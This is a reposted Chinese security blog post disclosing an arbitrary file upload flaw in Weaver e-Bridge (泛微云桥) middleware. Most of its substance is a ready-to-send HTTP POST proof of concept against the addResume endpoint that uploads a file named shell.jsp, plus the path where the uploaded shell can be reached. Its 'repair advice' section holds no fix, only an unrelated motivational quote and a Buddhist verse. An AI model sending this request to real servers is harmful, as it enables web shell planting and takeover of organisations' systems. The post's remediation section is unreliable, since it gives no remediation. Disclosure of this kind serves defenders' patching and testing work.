【文件上传】泛微云桥

admin 2024年8月6日15:32:44评论125 views字数 1611阅读5分22秒阅读模式

导言

文章仅用作网络安全人员对自己网站、服务器等进行自查检测,不可用于其他用途,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。切勿用于网络攻击!!!

【文件上传】泛微云桥

PART 

【文件上传】泛微云桥
【文件上传】泛微云桥

漏洞描述

泛微云桥(e-Bridge)是上海泛微网络科技股份有限公司开发的一款系统集成中间件。它主要的功能是在互联网开放资源与企业信息化系统之间架起桥梁,帮助企业快速实现基于互联网的移动办公应用接入,在其addResume接口存在任意文件上传漏洞,从而获取服务器权限
【文件上传】泛微云桥

漏洞复现

漏洞URL:/wxclient/app/recruit/resume/addResume?fileElementId=H

漏洞参数:无

漏洞详情:

【文件上传】泛微云桥

POC:

POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1Host: 127.0.0.1:8088Content-Length: 361Cache-Control: max-age=0sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryD5Mawpg068t7pbxZContent-Disposition: form-data; name="file"; filename="shell.jsp"Content-Type: application/octet-stream127------WebKitFormBoundaryD5Mawpg068t7pbxZContent-Disposition: form-data; name="file"; filename="shell.jsp"Content-Type: application/octet-stream127------WebKitFormBoundaryD5Mawpg068t7pbxZ--

shell地址:

/upload/202408/1-2位大写字母/shell.jsp

【文件上传】泛微云桥

修复建议

三月就要到了,从今天起,努力去做一个可爱的人,不羡慕谁,也不埋怨谁,在自己的道路上,欣赏自己的风景,遇见自己的幸福。

【文件上传】泛微云桥
【文件上传】泛微云桥
【文件上传】泛微云桥

无上甚深微妙法,百千万劫难遭遇;

我今见闻得受持,愿解如来真实义。

【文件上传】泛微云桥
【文件上传】泛微云桥
【文件上传】泛微云桥

——The  End——

【文件上传】泛微云桥

原文始发于微信公众号(小羊安全屋):【文件上传】泛微云桥

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月6日15:32:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【文件上传】泛微云桥https://cn-sec.com/archives/3038274.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息